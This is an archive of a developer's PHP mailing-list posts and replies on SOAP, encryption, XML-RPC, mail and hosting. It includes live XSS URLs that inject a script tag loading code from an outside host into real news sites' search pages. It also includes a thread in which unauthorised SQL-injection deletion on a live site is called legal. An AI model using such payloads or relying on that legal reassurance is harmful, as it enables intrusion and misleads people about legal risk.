[PHP] PHP5 SOAP...

2009-06-16 Thread Russell Jones 
I'm working on a project using SOAP and WS-Security in which I am failing
miserably.

Is there a way to inspect the actual XML, header, etc. that is actually
being sent. I feel like I am constructing the call correctly, and I know
exactly what needs to be sent, but I dont know how to see exactly what is
sent - all I get back are useless errors like not enough information sent,
etc...

Any ideas? Any SOAP pros out there?


Russell Jones
CTO Virante, Inc.
r...@virante.com
919-459-1035

[PHP] PHP/MYSQL/ Encrypting Sensetive information

2009-04-17 Thread Russell Jones 
We are looking at a project where we will potentially need to store
sensetive information in a few fields of a MySQL table. Any recommendations
on where to look for best practices in doing this? for encrypting the data,
etc.? We will need to be able to decrypt the data as well, although this can
probably be done locally, so hashing alone is not really an option.

Russell Jones

[PHP] DNS lookup w/ php

2007-01-15 Thread Russell Jones 

If I wanted to determine whether a domain has set up mx records, how could I
accomplish this with PHP?

Re: [PHP] Distinguishing between a mouse click and a refresh?

2006-12-04 Thread Russell Jones 

Yes, sort of. lets say that your page is 'http://www.php.net' and you want
to make sure your visitor got there with a click, and not a refresh...

first, get the referer...

$_SERVER['HTTP_REFERER'];

then do something like this...

$refsite = file_get_contents($_SERVER['HTTP_REFERER']);
$refsite = str_replace('','',$refsite);
$refsite = str_replace('','',$refsite);

if(stristr($refsite,'href=http://www.php.net')  !stristr($refsite,url=
http://www.php.net;)) {
 // it came from a click
}
else {
// maybe not a click
}





On 12/4/06, Mark London [EMAIL PROTECTED] wrote:


Is there any way for PHP to know whether it is being called due to a
browser refresh versus a mouse click?  I think the answer is no but I
just want to be sure.  Thanks.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] PHP Search and Privacy...

2006-10-24 Thread Russell Jones 

You're right - i dont know if there is even a standards body that would
cover something like this. I am assuming, along with that answer, that none
of the popular php site search tools have implemented it yet. Ill see if i
can throw something into one of the more common scripts...

Russ

On 10/23/06, Chris [EMAIL PROTECTED] wrote:


Russell Jones wrote:
 Does anyone know if any of the PHP Site-Search tools have implemented
the
 new #privacy search standard (http://www.poundprivacy.org). Looking to
 install a new site-search and I would really like to install something
that
 is compliant...

Don't know of any off hand but that site looks like a campaign to make
something happen, not a standard. Two completely different things.

Pound Privacy is a *campaign* to create the first standard for search
engine query privacy.

--
Postgresql  php tutorials
http://www.designmagick.com/

[PHP] PHP Search and Privacy...

2006-10-23 Thread Russell Jones 

Does anyone know if any of the PHP Site-Search tools have implemented the
new #privacy search standard (http://www.poundprivacy.org). Looking to
install a new site-search and I would really like to install something that
is compliant...

[PHP] Simple Array Question...

2006-10-05 Thread Russell Jones 

lets say I have an array...

$myArray = array (

firstkey = first val,
secondkey = second val

)


Can I still call these by their numeric order? ie, echo $myArray[0] shoudl
print out first val...

Re: [PHP] Newbie Form Question

2006-08-04 Thread Russell Jones 

In most cases, your PHP build is set up with mail() attached to whatever
SMTP you have on the server.

you would just use the following...

mail($recipientemail,$subject,$message);

On 8/4/06, Duncan Hill [EMAIL PROTECTED] wrote:


On Friday 04 August 2006 13:27, Jay Blanchard wrote:
 [snip]
 I was wondering how simple it would be to set up a script to provide a
 subscribe/unsubscribe form for a list serve. The form would send an
 email to
 the subscribe address or unsubscribe address as selected.
 [/snip]

 I wondered about that the other day myself and came to the conclusion
 that it would be really simple. It must be, others have done it.

Not terribly difficult at all.  One SMTP library for PHP and you're away.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] SQL injection

2006-08-02 Thread Russell Jones 

This is a good question and it, by and large, has not been considered.

In this particular instance, their programming is not protected by any kind
of encryption laws that would prevent decryption (such as developing and
deploying the decryption of Adobe Ebooks format).

Furthermore, because you reported the flaw directly to the webmaster and did
not publish it, there is no way that you caused any meaningful damage, nor
were you acting maliciously.

I have exposed XSS errors before on Google via my blog, even wrote a program
for April Fools that let you use XSS to post fake articles to real news
sites, and never got in trouble for it. You did not even announce the error
to the community, so you should be completely safe.

In real life terms, if you walked into the store and saw that the cash
register was slightly broken and slightly opened, and reached in and pulled
out a dollar to show the cashier what was wrong, you would not get in
trouble. It may be bold, but it is not a crime.

On 8/2/06, Peter Lauri [EMAIL PROTECTED] wrote:


Hi all,



I saw some strange error messages from a site when I was surfing it, and
it
was in form of SQL. I did some testing of the security of the SQL
injection
protection of that site, and it showed it was not that protected against
SQL
injections. To show this to them, I deleted my own record in their
database
after finding out the table name of the entity in the database. I also
found out a lot of other that I think is important table names.



What I did to them was to report this to them, and inform them about the
damage I created, and what could have been done. (I did DELETE FROM
tablename WHERE id=1234, what if I did DELETE FROM tablename, destruction
if
no backup). This is a large athletic site in Sweden, with more then
100,000 daily visitors.



What I am a little bit worried about is the legal part of this; can I be
accused of breaking some laws? I was just doing it to check if they were
protected, and I informed them about my process etc. I only deleted my
record, no one else's. In Sweden it might have been called computer
break-in, but I am not sure.



Anyone with experience of a similar thing?



Best regards,

Peter Lauri

Re: [PHP] regular expression to extract from the middle of a string

2006-07-14 Thread Russell Jones 

Ill probably get attacked viciously for this with pitchforks and machetes,
but I get sick and tired of trying to figure out regular expressions a lot
of times, so I use the following functions... getSingleMatch(),
getMultiMatch(), getSingleMatchBackwards()


function getSingleMatch($start,$end,$content) {
// finds the first match giving a beginning and a part of string that
you want to grab

// eg: to get the title from an html document, you would just use the
command getSingleMatch('title','/title',$html);


$exp = explode($start,$content);
$exp2 = explode($end,$exp[1]);

return $exp2[0];
}


function getMultiMatch($start,$end,$content) {
// finds all the non-embeded matches based on a beginning and ending string
// eg: to get all the h1 tags in an html document, you would use
getMultiMatch('h1','/h1',$html);

$exp = explode($start,$content);
foreach($exp as $pi) {

if(stristr($pi,$end)) {
$ex2 = explode($end,$pi);
$matches[] = $ex2[0];


}


}

return $matches;

}

function getSingleMatchBackwards($start,$end,$content) {
// the same as getSingleMatch except it goes backwards to forwards. This
helps in cases where the
// most distinct delimiter is at the end of your target rather than the
beginning.

$exp = explode($end,$content);
$exp2 = explode($start,$exp[0]);


return $exp2[count($exp2)-1];

}






On 7/14/06, Kim Christensen [EMAIL PROTECTED] wrote:


On 7/14/06, Steve Turnbull [EMAIL PROTECTED] wrote:
 I have a string similar to the following;

 cn=emailadmin,ou=services,dc=domain,dc=net

 I want to extract whatever falls between the 'cn=' and the following
 comma - in this case 'emailadmin'.


$pattern= /[^=]+=([^,]+)/;
preg_match($pattern, $string, $matches);
print_r($matches);

Voila! (Untested for now, I'm pretty drunk so sorry if it ain't workin
out like you want to)

--
Kim Christensen

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Language Translation (spanish-english) PHP

2006-07-13 Thread Russell Jones 

Anyone know of an API (soap, xml-rpc, rest, anything) for PHP that assists
with language translation?

Thanks

Russ

[PHP] Language Translation and PHP...

2006-07-12 Thread Russell Jones 

Anyone know of any language translation APIs or anything of that sort out
there? Looking to translate quite a bit of content and would rather not do
it by hand.

[PHP] PHP and mySQL getting smashed...

2006-05-17 Thread Russell Jones 

I have a site that is getting 30K+ traffic daily and it is smashing mySQL -
any ideas on what to do to make the mysql connections more efficient, or
anything in general. No bandwidth issue here, just the server getting
killed.


Thanks

[PHP] Download image in PHP

2006-04-05 Thread Russell Jones 
I have an image library on one site that I want to be able to access from
another, but I actually want the image downloaded and cached to the new site
(so that it doesnt keep taxing the image server).

I allow the file() command to pull from other sites, can I do this with just
the file('http://www.site.com/image.jpg;); - or how would i do this?

Russ

Re: [PHP] microsoft PHP ?

2006-04-01 Thread Russell Jones 
Are you guys sure, I mean the St Louis Post Dispatch is showing it too... As
is Cincinatti.com

http://search.cincinnati.com/sp?aff=5keywords=%3Cscript%20src=http://www.xssfools.com/xss.php%3Fy%3Dh917254010%3E%3C/script%3E

http://www.stltoday.com/stltoday/search.nsf/sitesearchresults?openviewtype=1ch=Homequery=%3Cscript+src%3Dhttp%3A%2F%2Fwww.xssfools.com%2Fxss.php%3Fy%3Dh917254010%3E%3C%2Fscript%3E

On 4/1/06, Stut [EMAIL PROTECTED] wrote:

 Joe Wollard wrote:
  Leave poor Zouari alone! I for one think that Microsoft buying Zend
  would be the best thing to happen to PHP, EVAR! This Rasmus guy didn't
  even mean for PHP to be what it is, he just wanted something simple and
  now look at it. It's WAY to complex for an unorganized bunch of
  hobbyists to maintain. I'm personally looking forward to the way they'll
  clean things up. Who knows, maybe once they've got PHP under control we
  won't need these security 'experts' like Chris Shifflett any more
  because would be hackers won't be able to see the source code, which of
  course means they won't be able to find vulnerabilities. You guys just
  need to give up on this open source hippie dream and let Microsoft
  change things for the better - who cares if Stephen King thinks they are
  working in conjunction with the Crimson King and that they might build
  robots that will someday take over the world and more or less 'suck the
  s-m-r-t' out of 50% of the worlds twins? He looks creepy anyway.
 
   - and a happy April fool's to all ;-)

 Here's assuming that was a joke so I won't get into the factual errors.
 I wonder how Zend and the other core developers will feel about being
 referred to as an unorganized bunch of hobbyists.

 -Stut

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] XML-RPC or SOAP

2006-03-30 Thread Russell Jones 
I would go with XML-RPC. I currently use XML-RPC to run LinkSleeve - a
link-spam detection tool. In my opinion, I have found XML-RPC to be easier
to use and understand. If at any point in your product you will be dealing
with customers / vendors who will be beginners with both XML-RPC and SOAP, I
would say the learning curve for XML-RPC is much lower. I do feel, however,
that SOAP is potentially a more robust solution.

Anyway, just my 2 cents and, good luck.



On 3/30/06, Philip Hallstrom [EMAIL PROTECTED] wrote:

  I am at the beginning of creating a web service. As I am not very
 familar
  with both SOAP and XML-RPC it would not make much difference in which
 one I
  learn.
 
  Which one would you guys recommend for a web app that has to be
 transformed
  into a white lable solution.

 I just did one using SOAP.  Seems to work just fine.  Just be sure to get
 the WSDL generator from here:

 http://www.schlossnagle.org/~george/php/WSDL_Gen.tgz

 We did it using PHP5's soap extension.

 good luck!

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: Detect where someone comes from

2006-03-06 Thread Russell Jones 
If you want to find out who is actually linking to you altogether (such as
for search engine optimization, etc.) you are going to want to use the
following search query in Yahoo...

linksite:yoursite.com -site:yoursite.com

This will tell you everyone who is linking to you minus the links coming
from your site. Google only shows a subset of the links pointing to you, and
it is difficult to exclude your own domain from those results. MSN doesn't
have a deep enough spider to really give you an accurate response, so Yahoo
is the best.

There are some more tricks if you are interested, shoot me an email.

Russ Jones
CTO Virante, Inc.


On 3/6/06, Barry [EMAIL PROTECTED] wrote:

 Benjamin Adams wrote:
  I was wondering if there was a way I can see where people are linking
  to me from.  Can I find this in php?
  --Ben
 $_SERVER[HTTP_REFERER];

 It's an Apache server variable.

 --
 Smileys rule (cX.x)C --o(^_^o)
 Dance for me! ^(^_^)o (o^_^)o o(^_^)^ o(^_^o)

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Help Defending against Email Injection Attacks

2006-02-06 Thread Russell Jones 
Why dont you just break the code. Before anything goes through replace
colons with dashes, dashes with underscores, etc. Stuff that will not mess
up readability but would prevent it from being parsed by the mail function.



On 2/6/06, Jim Moseby [EMAIL PROTECTED] wrote:

   - The most foolproof solution I can think of would be to continue
  logging the successful entries to a database and _not_ send the email.
  That way even if they get through, no emails get sent. The form would
  log the feedback and send an email to the admin that a comment is
  available for viewing. Is it time to abandon using mail() for all user
  contributed data?


 I think you have hit it on the head.  Don't use the mail() function at all
 in your web form.  You already have in place almost everything you need to
 thwart these buggers.  Just have cron kick off a script every so often
 (5,10,30 minutes?) that reads through the database for new comments, and
 mails them to the appropriate recipient(s).

 JM

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] PHP hosting with multiple domains?

2006-02-02 Thread Russell Jones 
Host-Gator has a fantastic, cheap reseller program, although you aren't
sharing space within 1 account.
My real recommendation would be ServerPronto though. $29.95/mo for a
dedicated with 40gig space. It works great for me, and you can host all the
domains you want. You will have to learn how to use Apache, though.

Russ



On 2/2/06, Richard Lynch [EMAIL PROTECTED] wrote:

 Maybe look for reseller acccounts and become your own reseller for all
 the sub-accounts.

 Or find somebody who gives enough HD space for your biggest accounts
 that you don't care about sharing.

 On Mon, January 30, 2006 11:34 am, [EMAIL PROTECTED] wrote:
  I know every month or so someone asks What's a good web hosting
  company to use for my PHP projects?.. I have most of the responses
  archived and have searched online a bit, but I have a specific wish
  and was hoping someone else had already found a good hosting company
  that'd let me do what I want.
 
  I want PHP (either 4 or 5, I'm not too picky) and MySQL.
 
  The thing I'm having trouble nailing down is one that might let me
  host multiple domains under a single hosting account and share
  bandwidth and HD space.   I have a couple of domains that aren't
  really doing anything right now (none of my domains really generate
  any traffic right now but could in the future).  But instead of paying
  to upgrade the storage of one domain then paying again to upgrade the
  storage of another one...  I'd like them to share harddrive space and
  bandwidth.
 
  Failing that, Doster (the registrar I use) can let me point a domain
  to a subdirectory on another domain  (ie.  http://www.altdomain.com
  actually lives at http://www.maindomain.com/altdomain).
 
 
  The hosting company I'm with right now is great for the fact that I
  locked my domains in at $20/year before they upped their prices
  (yeah... twenty per year) but they're kind of mom  pop and I'd like
  some place a little bigger and more professional even if it means
  paying more per month.
 
  I'm more interested in storage space than bandwidth right now, but
  that may change later (as the stuff being stored is accessed of
  course).
 
  I don't need many email addresses or databases.  Don't need a shell
  account.  Cron jobs/scheduled tasks (of PHP scripts) would be really
  nice.
 
  hah.. I'll stop now.  Think you get the idea.  The convenient
  management of multiple domains with a hosting provider is my ultimate
  goal.
 
  Thanks.
 
  -TG
 
  ___
  Sent by ePrompter, the premier email notification software.
  Free download at http://www.ePrompter.com.
 
  --
  PHP General Mailing List (http://www.php.net/)
  To unsubscribe, visit: http://www.php.net/unsub.php
 
 


 --
 Like Music?
 http://l-i-e.com/artists.htm

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Clean data / text for XML

2006-01-31 Thread Russell Jones 
Any good classes or scripts out there to just clean data that will be placed
into XML? I always have a problem with random tokens ruining XML and I
would prefer if I could just find a way to clean all the junk out before
putting it into an xml file.

Re: [PHP] way to write mysqli result set to disk

2006-01-25 Thread Russell Jones 
It may be better to go ahead and convert it to an array, or something that
can be handled more quickly when the cache is pulled than interpreting the
result again and again and again... Really dont know, just a thought.

On 1/25/06, jonathan [EMAIL PROTECTED] wrote:

 is there a way to write a mysqli result set to disk via
 file_put_contents or fwrite. it looks like we'd have to convert it to
 an array and then handle the array upon bringing it back in. I'm
 interested in writing a simple caching mechanism where sql results
 would be cached.

 thanks,

 jonathan

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] XML-RPC and comment spam...

2006-01-24 Thread Russell Jones 
I am trying to set up a personal blog of mine with the new
LinkSleeve.orgXML-RPC link spam service, but I dont know the firs
thing about PHP and
XML-RPC.

I did read that there are some problems with security, though, with the
popular PHP XML-RPC classes. Have these been fixed and which would you all
recommend?

rjones

[PHP] XML-RPC questions...

2006-01-24 Thread Russell Jones 
I have read recently that there are some issues with XML-RPC and security in
PHP classes. Have these been fixed? What would you recommend? I am looking
to create a LinkSleeve filter for my blog and it requires XML-RPC.


rjonesx